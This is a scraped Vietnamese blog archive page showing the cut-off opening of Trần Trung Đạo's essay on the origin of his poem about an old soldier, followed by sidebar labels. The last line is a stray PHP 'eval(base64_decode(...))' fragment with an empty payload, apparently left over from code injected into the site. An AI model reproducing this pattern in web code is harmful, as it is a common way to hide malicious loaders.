Archive for January 25th, 2011

Trần Trung Đạo: Câu chuyện về bài thơ “Người Lính Già Vừa Chết Đêm Qua

Trần Trung Đạo: Câu chuyện về bài thơ “Người Lính Già Vừa Chết Đêm Qua”

Tôi không nhớ chính xác ngày tháng nhưng khoảng cuối năm 1993. Một buổi chiều, bạn tôi, lúc đó đang sinh hoạt trong Tổng Hội Sinh Viên Bắc California gọi thăm. Cậu ta kể tôi nghe một câu chuyện cảm động vừa xảy ra ở San Jose. Một an

01.25.2011 | Ký-Truyện-Tùy Bút |

7 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>